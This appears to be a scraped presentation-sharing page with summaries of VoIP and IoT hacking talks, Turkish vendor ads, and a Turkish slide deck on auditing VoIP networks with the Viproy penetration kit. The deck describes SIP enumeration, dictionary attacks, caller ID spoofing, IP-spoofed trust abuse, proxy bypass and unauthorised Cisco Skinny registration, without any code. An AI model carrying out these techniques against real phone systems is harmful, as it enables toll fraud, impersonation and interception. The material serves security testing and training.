Linux Kullanıcıları Derneği tarafından her sene düzenlenen Özgür Yazılım ve Linux Günleri Bilgi Üniversitesi santral kampüsünde gerçekleşti, biz de FreePBX ile Özgür Santral Yazılımı başlıklı sunumumuz ile katkıda bulunmaya çalıştık.
Linux Kullanıcıları Derneği tarafından her sene düzenlenen Özgür Yazılım ve Linux Günleri Bilgi Üniversitesi santral kampüsünde gerçekleşti, biz de FreePBX ile Özgür Santral Yazılımı başlıklı sunumumuz ile katkıda bulunmaya çalıştık.
#4G LTE ve 5G gibi yeni nesil iletişim teknolojileri sayesinde IP üzerinden ses ve video iletişiminin artması ile veri zafiyeti ve güvenlik eksikleri, IP altyapısının doğası da düşünüldüğünde, ana endişe konuları haline gelmiştir. IP tabanlı yeni iletişim teknolojileri, tüketicilerin iletişim alışkanlıklarından, kurumların altyapılarına ve iletişim sağlayıcıların iş modellerine kadar kapsamlı bir dönüşüme neden olmaktadır. IP tabanlı bu sistemler, maliyet avantajı, operasyon ve kurulum kolaylığı, lokasyon bağımsızlığı gibi avantajlar getirmesinin yanında ciddi güvenlik risklerini de beraberinde getirmektedir. Bu yüzden güvenli IP iletişiminin en önemli amacı, uygulama seviyesi ataklara yoğunlaşmak olmalıdır. NOVA çözümümüz ile zafiyetleri tespit edip, ataklara karşı önlem alabilir ve güvenli medya iletişimi sağlayabilirsiniz.
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
VoIP attacks have evolved, and they are targeting Unified Communications (UC), commercial services, hosted environment and call centres using major vendor and protocol vulnerabilities. This workshop is designed to demonstrate these cutting edge VoIP attacks, and improve the VoIP skills of the incident response teams, penetration testers and network engineers. Signalling protocols are the centre of UC environments, but also susceptible to IP spoofing, trust issues, call spoofing, authentication bypass and invalid signalling flows. They can be hacked with legacy techniques, but a set of new attacks will be demonstrated in this workshop. This workshop includes basic attack types for UC infrastructure, advanced attacks to the SIP and Skinny protocol weaknesses, network infrastructure attacks, value added services analysis, Cdr/Log/Billing analysis and Viproy use to analyse signalling services using novel techniques. Also the well-known attacks to the network infrastructure will be combined with the current VoIP vulnerabilities to test the target workshop network. Attacking VoIP services requires limited knowledge today with the Viproy Penetration Testing Kit (written by Fatih). It has a dozen modules to test trust hacking issues, information collected from SIP and Skinny services, gaining unauthorised access, call redirection, call spoofing, brute-forcing VoIP accounts, Cisco CUCDM exploitation and debugging services using as MITM. Furthermore, Viproy provides these attack modules in the Metasploit Framework environment with full integration. The workshop contains live demonstration of practical VoIP attacks and usage of the Viproy modules.
In this hands-on workshop, attendees will learn about basic attack types for UC infrastructure, advanced attacks to the SIP protocol weaknesses, Cisco Skinny protocol hacking, hacking Cisco CUCDM and CUCM servers, network infrastructure attacks, value added services analysis, Cdr/Log/Billing analysis and Viproy VoIP pen-test kit to analyse VoIP services using novel techniques. New CDP, CUCDM and Cisco Skinny modules and techniques of Viproy will be demonstrated in the workshop as well.
Black Hat USA 2016 - Presentation Video
https://www.youtube.com/watch?v=rl_kp5UZKlw
Larger organisations are using VoIP within their commercial services and corporate communications and the take up of cloud based Unified Communications (UC) solutions is rising every day. However, response teams and security testers have limited knowledge of VoIP attack surfaces and threats in the wild. Due to this lack of understanding of modern UC security requirements, numerous service providers, larger organisations and subscribers are leaving themselves susceptible to attack. Current threat actors are repurposing this exposed infrastructure for botnets, toll fraud etc.
The talk aims to arm response and security testing teams with knowledge of cutting-edge attacks, tools and vulnerabilities for VoIP networks. Some of the headlines are: attacking cloud based VoIP solutions to jailbreak tenant environments; discovering critical security vulnerabilities with the VoIP products of major vendors; exploiting harder to fix VoIP protocol and service vulnerabilities; testing the security of IP Multimedia Subsystem (IMS) services; and understanding the toolset developed by the author to discover previously unknown vulnerabilities and to develop custom attacks. In addition, the business impact of these attacks will be explained for various implementations, such as cloud UC services, commercial services, service provider networks and corporate communication. Through the demonstrations, the audience will understand how can they secure and test their communication infrastructure and services. The talk will also be accompanied by the newer versions of Viproy and Viproxy developed by the author to operate the attack demonstrations.
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceFatih Ozavci
Enterprise companies are using consumer and IoT devices to complete (or expand) their services such as broadband, IPTV, media streaming, satellite, voice and 3G/4G services. Although the devices are owned by the service providers, subscribers have limited (or full) access to them with service agreements. In addition to that, some of consumer devices also have roles on corporate communications, environment security or employee services. Consumer devices are located at subscriber premises; therefore, the traditional security testing approach only covers backend services security, not the devices.
Consumer and IoT devices are susceptible to hardware hacking based attacks such as firmware dumping, re-flashing with a custom firmware, and getting low level access using the physical management interfaces such as SPI, JTAG and UART. Low level access obtained can be used to modify device behaviours or their initial states. This helps attackers to debug consumer devices and operator services, to find new vulnerabilities, and to obtain the device configuration which may contain credentials for the service infrastructure.
Embedded device and hardware hacking is a rising skill set for penetration testers. It is required to understand targeted attacks which may include hardware implants, modified hardware attacking their own infrastructure or compromised devices that target the human factor. Some of advanced testing examples to be discussed are preparing a custom hardware for persistent access during a red teaming exercise, preparing a compromised consumer device for human factor pen-testing, attacking TR-069 services of a provider using smart home modems or altering the security controls of a device to abuse the service.
The presentation focuses on how the existing security testing techniques should be evolved with hardware and IoT hacking, and how service providers can make their infrastructure secure for cutting-edge attacks. Essential hardware hacking information, identifying and using physical management interfaces, hardware hacking toolset, well-known hardware attacks and hardware testing procedure will be presented in a road map for consumer devices security testing. Also a security testing approach will be explained to develop new security testing services and to improve existing ones such as red teaming, human factor pen-testing and infrastructure pen-testing.
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
Enterprise companies are increasingly using Microsoft Lync 2010/2013 (a.k.a Skype for Business 2015) services as call centre, internal communication, cloud communication and video conference platform. These services are based on the VoIP and instant messaging protocols, and support multiple client types such as Microsoft Office 365, Microsoft Lync, Skype for Business, IP phones and teleconference devices. Also the official clients are available for mobile devices (e.g. Windows phone, Android and iOS), desktops (Mac, Linux and Windows) and web applications developed with .NET framework. Although the Microsoft Lync platform has been developed along with the new technologies, it still suffers from old VoIP, teleconference and platform issues.
Modern VoIP attacks can be used to attack Microsoft Lync environments to obtain unauthorised access to the infrastructure. Open MS Lync frontend and edge servers, insecure federation security design, lack of encryption, insufficient defence for VoIP attacks and insecure compatibility options may allow attackers to hijack enterprise communications. The enterprise users and employees are also the next generation targets for these attackers. They can attack client soft phones and handsets using the broken communication, invalid protocol options and malicious messaging content to compromise sensitive business assets. These attacks may lead to privacy violations, legal issues, call/toll fraud and intelligence collection.
Attack vectors and practical threats against the Microsoft Lync ecosystem will be presented with newly published vulnerabilities and Microsoft Lync testing modules of the Viproy VoIP kit developed by the speaker. This will be accompanied by live demonstrations against a test environment.
• A brief introduction to Microsoft Lync ecosystem
• Security requirements, design vulnerabilities and priorities
• Modern threats against commercial Microsoft Lync services
• Demonstration of new attack vectors against target test platform
Gezi Parkı protestoları nedeniyle oluşan mahremiyet ihlallerini önlemek ve mahremiyetin korunması için yapılması gerekenleri anlatan bu sunum, Abbasağa Park'ında sunulmuştur.
Hacking and Attacking VoIP Systems - What You Need To KnowDan York
Presentation by Dan York at AstriCon 2007 about how to secure VoIP systems with a focus on the Asterisk open source PBX. The presentation outlines the issues involved with VoIP security, the tools out there to attack/test VoIP systems, best practices to defend against attacks and ends with some specific security recommendations for Asterisk. Audio will soon be available at http://www.blueboxpodcast.com/ (and will be synced to this presentation).
#4G LTE ve 5G gibi yeni nesil iletişim teknolojileri sayesinde IP üzerinden ses ve video iletişiminin artması ile veri zafiyeti ve güvenlik eksikleri, IP altyapısının doğası da düşünüldüğünde, ana endişe konuları haline gelmiştir. IP tabanlı yeni iletişim teknolojileri, tüketicilerin iletişim alışkanlıklarından, kurumların altyapılarına ve iletişim sağlayıcıların iş modellerine kadar kapsamlı bir dönüşüme neden olmaktadır. IP tabanlı bu sistemler, maliyet avantajı, operasyon ve kurulum kolaylığı, lokasyon bağımsızlığı gibi avantajlar getirmesinin yanında ciddi güvenlik risklerini de beraberinde getirmektedir. Bu yüzden güvenli IP iletişiminin en önemli amacı, uygulama seviyesi ataklara yoğunlaşmak olmalıdır. NOVA çözümümüz ile zafiyetleri tespit edip, ataklara karşı önlem alabilir ve güvenli medya iletişimi sağlayabilirsiniz.
The Art of VoIP Hacking - Defcon 23 WorkshopFatih Ozavci
VoIP attacks have evolved, and they are targeting Unified Communications (UC), commercial services, hosted environment and call centres using major vendor and protocol vulnerabilities. This workshop is designed to demonstrate these cutting edge VoIP attacks, and improve the VoIP skills of the incident response teams, penetration testers and network engineers. Signalling protocols are the centre of UC environments, but also susceptible to IP spoofing, trust issues, call spoofing, authentication bypass and invalid signalling flows. They can be hacked with legacy techniques, but a set of new attacks will be demonstrated in this workshop. This workshop includes basic attack types for UC infrastructure, advanced attacks to the SIP and Skinny protocol weaknesses, network infrastructure attacks, value added services analysis, Cdr/Log/Billing analysis and Viproy use to analyse signalling services using novel techniques. Also the well-known attacks to the network infrastructure will be combined with the current VoIP vulnerabilities to test the target workshop network. Attacking VoIP services requires limited knowledge today with the Viproy Penetration Testing Kit (written by Fatih). It has a dozen modules to test trust hacking issues, information collected from SIP and Skinny services, gaining unauthorised access, call redirection, call spoofing, brute-forcing VoIP accounts, Cisco CUCDM exploitation and debugging services using as MITM. Furthermore, Viproy provides these attack modules in the Metasploit Framework environment with full integration. The workshop contains live demonstration of practical VoIP attacks and usage of the Viproy modules.
In this hands-on workshop, attendees will learn about basic attack types for UC infrastructure, advanced attacks to the SIP protocol weaknesses, Cisco Skinny protocol hacking, hacking Cisco CUCDM and CUCM servers, network infrastructure attacks, value added services analysis, Cdr/Log/Billing analysis and Viproy VoIP pen-test kit to analyse VoIP services using novel techniques. New CDP, CUCDM and Cisco Skinny modules and techniques of Viproy will be demonstrated in the workshop as well.
Black Hat USA 2016 - Presentation Video
https://www.youtube.com/watch?v=rl_kp5UZKlw
Larger organisations are using VoIP within their commercial services and corporate communications and the take up of cloud based Unified Communications (UC) solutions is rising every day. However, response teams and security testers have limited knowledge of VoIP attack surfaces and threats in the wild. Due to this lack of understanding of modern UC security requirements, numerous service providers, larger organisations and subscribers are leaving themselves susceptible to attack. Current threat actors are repurposing this exposed infrastructure for botnets, toll fraud etc.
The talk aims to arm response and security testing teams with knowledge of cutting-edge attacks, tools and vulnerabilities for VoIP networks. Some of the headlines are: attacking cloud based VoIP solutions to jailbreak tenant environments; discovering critical security vulnerabilities with the VoIP products of major vendors; exploiting harder to fix VoIP protocol and service vulnerabilities; testing the security of IP Multimedia Subsystem (IMS) services; and understanding the toolset developed by the author to discover previously unknown vulnerabilities and to develop custom attacks. In addition, the business impact of these attacks will be explained for various implementations, such as cloud UC services, commercial services, service provider networks and corporate communication. Through the demonstrations, the audience will understand how can they secure and test their communication infrastructure and services. The talk will also be accompanied by the newer versions of Viproy and Viproxy developed by the author to operate the attack demonstrations.
Hardware Hacking Chronicles: IoT Hacking for Offence and DefenceFatih Ozavci
Enterprise companies are using consumer and IoT devices to complete (or expand) their services such as broadband, IPTV, media streaming, satellite, voice and 3G/4G services. Although the devices are owned by the service providers, subscribers have limited (or full) access to them with service agreements. In addition to that, some of consumer devices also have roles on corporate communications, environment security or employee services. Consumer devices are located at subscriber premises; therefore, the traditional security testing approach only covers backend services security, not the devices.
Consumer and IoT devices are susceptible to hardware hacking based attacks such as firmware dumping, re-flashing with a custom firmware, and getting low level access using the physical management interfaces such as SPI, JTAG and UART. Low level access obtained can be used to modify device behaviours or their initial states. This helps attackers to debug consumer devices and operator services, to find new vulnerabilities, and to obtain the device configuration which may contain credentials for the service infrastructure.
Embedded device and hardware hacking is a rising skill set for penetration testers. It is required to understand targeted attacks which may include hardware implants, modified hardware attacking their own infrastructure or compromised devices that target the human factor. Some of advanced testing examples to be discussed are preparing a custom hardware for persistent access during a red teaming exercise, preparing a compromised consumer device for human factor pen-testing, attacking TR-069 services of a provider using smart home modems or altering the security controls of a device to abuse the service.
The presentation focuses on how the existing security testing techniques should be evolved with hardware and IoT hacking, and how service providers can make their infrastructure secure for cutting-edge attacks. Essential hardware hacking information, identifying and using physical management interfaces, hardware hacking toolset, well-known hardware attacks and hardware testing procedure will be presented in a road map for consumer devices security testing. Also a security testing approach will be explained to develop new security testing services and to improve existing ones such as red teaming, human factor pen-testing and infrastructure pen-testing.
VoIP Wars: Destroying Jar Jar Lync (Unfiltered version)Fatih Ozavci
Enterprise companies are increasingly using Microsoft Lync 2010/2013 (a.k.a Skype for Business 2015) services as call centre, internal communication, cloud communication and video conference platform. These services are based on the VoIP and instant messaging protocols, and support multiple client types such as Microsoft Office 365, Microsoft Lync, Skype for Business, IP phones and teleconference devices. Also the official clients are available for mobile devices (e.g. Windows phone, Android and iOS), desktops (Mac, Linux and Windows) and web applications developed with .NET framework. Although the Microsoft Lync platform has been developed along with the new technologies, it still suffers from old VoIP, teleconference and platform issues.
Modern VoIP attacks can be used to attack Microsoft Lync environments to obtain unauthorised access to the infrastructure. Open MS Lync frontend and edge servers, insecure federation security design, lack of encryption, insufficient defence for VoIP attacks and insecure compatibility options may allow attackers to hijack enterprise communications. The enterprise users and employees are also the next generation targets for these attackers. They can attack client soft phones and handsets using the broken communication, invalid protocol options and malicious messaging content to compromise sensitive business assets. These attacks may lead to privacy violations, legal issues, call/toll fraud and intelligence collection.
Attack vectors and practical threats against the Microsoft Lync ecosystem will be presented with newly published vulnerabilities and Microsoft Lync testing modules of the Viproy VoIP kit developed by the speaker. This will be accompanied by live demonstrations against a test environment.
• A brief introduction to Microsoft Lync ecosystem
• Security requirements, design vulnerabilities and priorities
• Modern threats against commercial Microsoft Lync services
• Demonstration of new attack vectors against target test platform
Gezi Parkı protestoları nedeniyle oluşan mahremiyet ihlallerini önlemek ve mahremiyetin korunması için yapılması gerekenleri anlatan bu sunum, Abbasağa Park'ında sunulmuştur.
Hacking and Attacking VoIP Systems - What You Need To KnowDan York
Presentation by Dan York at AstriCon 2007 about how to secure VoIP systems with a focus on the Asterisk open source PBX. The presentation outlines the issues involved with VoIP security, the tools out there to attack/test VoIP systems, best practices to defend against attacks and ends with some specific security recommendations for Asterisk. Audio will soon be available at http://www.blueboxpodcast.com/ (and will be synced to this presentation).
VoIP Wars: Destroying Jar Jar Lync (Filtered version)Fatih Ozavci
Enterprise companies are increasingly using Microsoft Lync 2010/2013 (a.k.a Skype for Business 2015) services as call centre, internal communication, cloud communication and video conference platform. These services are based on the VoIP and instant messaging protocols, and support multiple client types such as Microsoft Office 365, Microsoft Lync, Skype for Business, IP phones and teleconference devices. Also the official clients are available for mobile devices (e.g. Windows phone, Android and iOS), desktops (Mac, Linux and Windows) and web applications developed with .NET framework. Although the Microsoft Lync platform has been developed along with the new technologies, it still suffers from old VoIP, teleconference and platform issues.
Modern VoIP attacks can be used to attack Microsoft Lync environments to obtain unauthorised access to the infrastructure. Open MS Lync frontend and edge servers, insecure federation security design, lack of encryption, insufficient defence for VoIP attacks and insecure compatibility options may allow attackers to hijack enterprise communications. The enterprise users and employees are also the next generation targets for these attackers. They can attack client soft phones and handsets using the broken communication, invalid protocol options and malicious messaging content to compromise sensitive business assets. These attacks may lead to privacy violations, legal issues, call/toll fraud and intelligence collection.
Attack vectors and practical threats against the Microsoft Lync ecosystem will be presented with newly published vulnerabilities and Microsoft Lync testing modules of the Viproy VoIP kit developed by the speaker. This will be accompanied by live demonstrations against a test environment.
• A brief introduction to Microsoft Lync ecosystem
• Security requirements, design vulnerabilities and priorities
• Modern threats against commercial Microsoft Lync services
• Demonstration of new attack vectors against target test platform
This is my Athcon 2013 slide set. I also demonstrated that attacking mobile applications via SIP Trust, scanning via SIP proxies and MITM fuzzing in Live Demo.
Reboot the Open Realtime Revolution - #MoreCrypto (Fall 2014)Olle E Johansson
My talk at Voip2day 2014 in Madrid, Spain and Elastix World 2014 in Santiago, Chile. Asterisk is now 15 years old and the revolution has faded away and is now part of regular business. It's time to restart and look forward, build new things and include security by default. Security needs to be in focus for everyone in VoIP and realtime communication during the coming year.
07.12.2013 tarihinde Siber Güvenlik Derneği tarafından gerçekleştirilen Siber Güvenlik Buluşmaları 7. oturum, 1. kısımda anlatılan konularun sunum dosyası
Dünyada VoIP ağlarına olan ataklar artarak devam ediyor.
Erişim teknolojilerdeki jenerasyon değişimi ve IPv6’nın yaygınlaşması ile birlikte VoIP’in kullanımı artmakta ve bu artışa paralel olarak birçok dolandırıcılık ve zafiyetlerle karşılaşılmaktadır.
Netaş Nova Güvenlik Ailesi Ürünleri ile güvendesiniz.
Her gün değişen kullanıcılara internet hizmeti mi sunuyorsunuz? 5651 sayılı yasa ile sistemdeki kullanıcılarınızın kullanım kayıtlarını veya IP atamalarını tutmanız mı gerekiyor?
Yasanın tüm gerektirdiklerini karşılayan, yönetimi kolay ve özelleştirilebilir bir loglama sistemi sunuyoruz.
Secure WLAN Teknolojisi
Otel, hastane, iş merkezi, misafirhane, restaurant, okul, kampüs gibi ortak internetin kullanıldığı alanlarda, illegal internet kullanımının engellenmesi ve takip edilmesi adına yürürlüğe giren 5651 yasası, ortak internet kullanımı sunan tüm işletme sahiplerine, sistemleri üzerinden internetten faydalanan tüm kullanıcılar için raporlama yapabilen bir internet kullanım geçmişi tutmalarını zorunlu hale getiriyor.
Bu yasa ile, tüm kullanıcıların internet erişimleri ve ziyaret ettikleri sayfalar bir donanım ve yazılım kombinasyonu ile takip edilmek ve kayıt altına alınmak zorunda olacak.
Cenetric olarak, geleceği önceden gören ekibimizle oluşturduğumuz çözümde, kullanıcılarınızın web erişimlerini düzenleyen ve kontrol altında tutan loglama sistemini, efektif video, ses ve data paylaşımına olanak sağlayan tek bir cihaz üzerinden sunuyoruz.
Temel Özellikler
Sunduğumuz merkezi kontrol sistemi ve hotspot çözümü özellikle kurumsal sektörde otel, restoran, kampüs ve havalimanı terminalleri gibi müşteri, misafir ve çalışanları na internet erişimi sunan işletmeler için özelleştirilmiş bir sistemdir.
Serbest Dolaşım (Roaming)
IAPP (Internet Access Point Protocol), bağlı olan kullanıcılarınızın access pointler arasında serbest dolaşımına izin verir.
Akıllı Ağ Yönetimi
Sunduğumuz EAP protokollü CAPWAP (Control and Provisioning of Wireless Access Points) hizmeti ile, varsayılan ağlarda bağlı olan access point cihazları tespit edilerek her birinin IP adresleri ağda tanımlandığı şekilde, otomatik olarak değiştirilir. Üstelik tüm yarlar web arayüzü veya SNMP protokolü üzerinden yapılabilir.
Guruplar ve Servis Kalitesi
Oluşturulan sınıflar ile sınıflandırılmış veya kategorize edilmiş erişim hizmetleri sunabilirsiniz. 8 adet gurup seçeneği, en efektif şekilde gurup ve erişim kategorileri belirlemenize olanak sağlar.
Bunun dışında, sistem içerisinde 4 ana kategori altında (video, ses, arka plan ve performans) sınıflandırma ve ölçeklendirme yapılabilir. Her bir gurup, kendisine bağlı olan erişim alanı ile tanımlanır; iyi belirlenmiş kurallar ile her bir erişim alanı guruba belirlenmiş kurallar çerçevesinde erişim sunar. Örneğin, VoIP olarak isimlendirilen bir gurup, kendisine ait olarak belirlenmiş access point cihazlarının bulunduğu alan içerisinde yine önceden saptanmış WiFi telefonlarını yönetebilir.
Firewall ve Kurallar
Firewall'da tanımlanmış güvenlik dereceleri, hiyerarşik olarak "en düş
Tedarikçilerden kaynaklı siber güvenlik risklerinin belirlenmesi konusunda verdiğimiz danışmanlık hizmeti kapsamında düzenlenen 2 günlük çalıştaya ait giriş sunumudur.
1. Viproy ile VoIP Denetimi
Fatih Özavcı
Güvenlik Danışmanı
viproy.com
2. Konuşmacı
• Fatih Özavcı, Güvenlik Danışmanı
• İlgi alanları
• VoIP & Phreaking
• Mobil teknolojiler
• Ağ altyapıları
• Gömülü sistemler
• Donanım ve IoT Hacking
• Viproy VoIP sızma aracı geliştiricisi
• Uluslararası konuşmacı ve eğitmen
• Blackhat, Defcon, Troopers, AusCert, Ruxcon
viproy.com 2
3. Tehditler ve Saldırgan Yetenekleri
Varsayımlar:
• VoIP ağlarına fiziksel olarak erişim zordur
• VoIP saldırıları üst düzey yetenekler gerektirir
• Saldırılar mahremiyet ve çağrı sahteciliği odaklıdır
• VoIP servisleri çok güvenli yapılandırılmıştır
Gerçek Hayat:
• Fiziksel güvenlik yetersizliği, zayıf erişim denetimi
• Viproy sonrası, saldırı için VoIP deneyimi gerekmiyor
• İstemci saldırıları, istihbarat toplama, kalıcı erişim
• Kolay parolalar, eski sistemler, güncelleme sorunları
viproy.com 3
4. Viproy VoIP Sızma Aracı
• Viproy, Vulcan’ca “Çağrı/Karar“ anlamına
gelmektedir
• Viproy VoIP sızma aracı
• Metasploit Framework test modülleri paketi
• Hızlı test geliştirme için SIP & Skinny kütüphaneleri
• Özel SIP başlıkları ve kimlik doğrulama desteği
• Güven ilişkisi analizi, SIP Proxy analizi, MITM modülleri
• Modüller
• Basit ve karmaşık SIP testleri kapasitesi (mesaj, çağrı)
• SIP kimlik doğrulama, kullanıcı ve alan adı saptama
• SIP güven ilişkisi analizi, SIP proxy kullanımı, sahte servis
• Cisco Skinny analizi ve Cisco CUCM/CUCDM exploitleri
• Polycom yapılandırma ayıklayıcı
viproy.com 4
5. Güvenlik Denetimi ve Özgür Yazılımlar
• Denetim kuruma/sisteme/yazılıma özel olmalıdır ve
her testin özelleştirilmesi gerekmektedir
• Özel testlerin tanımlanabilmesi, kullanılabilecek test
şekillerinin döngülere sokulmasını gerektirmektedir
• Çeşitli denetim adımlarında alınan çıktıların
birleştirilmesi ve beraber değerlendirilmesi
gerekmektedir
• Basit, hızlı ve amaca hizmet eden yazılımlar denetim
sürecinin verimini arttırmaktadır
• Kaynak kodu açık, yapılan işlemin net olarak
görünebileceği araçlar tercih edilmelidir
viproy.com 5
9. Örnek Denetim Rotası
viproy.com 9
• Sunucuları
Saptama
• İstemcileri
Saptama
• Ağı Kavrama
• Bilgi Toplama
Kapsamı
Belirleme
Ağ Altyapısı
Analizi
VoIP Sunucu
Analizi
VoIP İstemci
Analizi
• Altyapı Keşfi
• SSL/TLS Analizi
• Paket Yakalama
• Çağrı
Çözümleme
• Servis Engelleme
• Kimlik Deneme
• Yetki Analizi
• Özel Çağrılar
• Yazılım Sorunları
• Yönetim Sorunları
• Özel Testler
• Doğrudan Çağrı
• Yazılım Sorunları
• Yönetim Sorunları
• Özel Testler
10. Denetim Kapsamının Belirlenmesi
• Denetim bilgilerinde verilenler her zaman
yeterli değildir
• Sunucular (SIP, SIP Proxy, RTP Proxy)
• İstemciler (Yazılım, Özel Donanım)
• Ağ Altyapısının Yerleşimi
• Denetim öncesi gerekli bilgiler
• Donanım ve Yazılımların Türü, Sürümü
• Seçilen Protokoller ve Seçenekler
• Yönetim veya Destek Amaçlı Servisler
• TLS ve SRTP Kullanımı
viproy.com 10
11. VoIP Servisinin Anlaşılması
• İstemci Türleri
• Yazılım (IP Communicator, Android/iOS Apps)
• IP telefonlar (Cisco 7945, Yealink)
• Video konferans cihazları (Cisco Presence)
• Harici konferans çözümleri (Webex, GoMeeting)
• Servis Amacı
• Uluslararası/Ulusal/Mobil şebeke bağlantıları
• Çağrı merkezi (ticari ürün ve özgür alterntifler)
• Ticari VoIP servisleri (mobil ve bulut çözümleri)
• Kurumsal kullanım (VLAN, toplantı odaları)
• VoIP protokolleri (SIP, Skinny, RTP, IAX, Diameter)
viproy.com 11
12. Fiziksel Erişim Analizi
• Yerel dağıtım şebekeleri ve odaları
• Ağ ve müşteri hizmeti sonlandırma cihazları
viproy.com 12
13. VoIP Ağına Fiziksel Erişim
• Toplantı odaları, lobi, misafir telefonları, acil
durum telefonları
• PC portları, PoE
• Raspberry Pi
• 3G/4G ile kalıcı erişim
viproy.com 13
18. Sinyalleşme
VoIP = Sinyaleşme + Medya
• Sinyalleşme servisleri çağrı başlatma, takip,
aktarım ve kayıt gibi işlemlerden sorumludur.
• Medya aktarımı ise sinyalleşmeden ayrı bir
kanaldan/servisten yapılır. (örn. RTP, H.323)
• Önemli sinyalleşme protokolleri
• SIP servisleri (Üretici uzantıları ve özelleştirmeler)
• Üreticiye özel sinyalleşme servisleri (SCCP / Skinny)
viproy.com 18
20. Temel SIP Akışı
viproy.com 20
SIP Server
1- REGISTER
1- 200 OK
2- INVITE
3- INVITE3- 183 Trying
3- 200 OK
4- ACK
RTP Proxy RTP
Phone A
Phone B
RTP
4- 200 OK
22. Temel Saldırılar
• SIP servislerinin ve görevlerinin bulunması
• Kullanılabilir metod ve özelliklerin keşfi
• SIP yazılımı ve açıklarının analizi
• Hedef dahili, kullanıcı ve alan adlarının saptanması
• Kimlik doğrulama olmaksızın SIP kaydı (trunk, VAS)
• Saptanan kullanıcı hesaplarına sözlük saldırısı
• Kimlik doğrulama ve kayıt olmaksızın çağrı analizi
• IP temelli doğrudan çağrı analizi
• Çağrı ve kimlik sahteciliği
viproy.com 22
26. Tüm Operatörler için Çağrı Sahteciliği
• Tüm operatörler arayan kimliğine güvenirler
• Bir tane etkilenen operatör ile herkes aldatılabilir
26viproy.com
27. İleri Düzey SIP Saldıları
Bütünleşik iletişimin olduğu ve çok sayıda
oturum yönetim geçidinin çalıştığı ağlarda ileri
düzey saldırılar da uygulanabilir.
• SIP Proxy atlatma saldırısı
• SIP güven ilişkileri analizi
• Servis engelleme analizi
viproy.com 27
28. SIP Proxy Atlatma Saldırısı
192.168.1.146
Melbourne
192.168.1.202
Brisbane
192.168.1.145 - Sydney
Production SIP Service
viproy.com 28
29. Dağıtık Servis Engelleme Saldırısı
SIP based DoS attacks
• UDP vulnerabilities and IP spoofing
• Too many errors, very very verbose mode
• ICMP errors
192.168.1.146
Melbourne
192.168.1.202
Brisbane
192.168.1.145 - Sydney
Production SIP Service
Alderaan
IP spoofed UDP SIP request
viproy.com 29
30. SIP Güven İlişkileri Analizi
30
Send INVITE/MESSAGE requests with
• IP spoofing (source is Brisbane),
• from field contains Spoofed IP and Port,
the caller ID will be your trusted host.
Universal
Trust
Tatooine
192.168.1.146
Melbourne
192.168.1.202
Brisbane
192.168.1.145 - Sydney
Production SIP Service
UDP Trust
viproy.com
31. SIP Güven İlişkileri Analizi
31
Universal
Trust
Tatooine
It’s a TRAP!
Send INVITE/MESSAGE requests with
• IP spoofing (source is Brisbane),
• from field contains special number,
you will have fun or voicemail access.
192.168.1.146
Melbourne
192.168.1.202
Brisbane
192.168.1.145 - Sydney
Production SIP Service
UDP Trust
viproy.com
35. Cisco Skinny Analizi
• Viproy, Skinny kütüphanesi ve 3 test modülü
ile güçlü bir Skinny test ortamı sunmaktadır
• İzinsiz kayıt
• İzinsiz çağrı açma
• İzinsiz çağrı yönlendirme
35viproy.com
37. Viproy için Kaynaklar
• Viproy VoIP Penetration and Exploitation Kit
Author : http://viproy.com/fozavci
Homepage : http://viproy.com
Github: http://www.github.com/fozavci/viproy-voipkit
• Attacking SIP Servers Using Viproy VoIP Kit (50 mins)
https://www.youtube.com/watch?v=AbXh_L0-Y5A
• Hacking Trust Relationships Between SIP Gateways
http://viproy.com/files/siptrust.pdf
• VulnVoIP: Örnek zafiyet içeren VoIP sistemi
http://www.rebootuser.com/?cat=371
viproy.com 37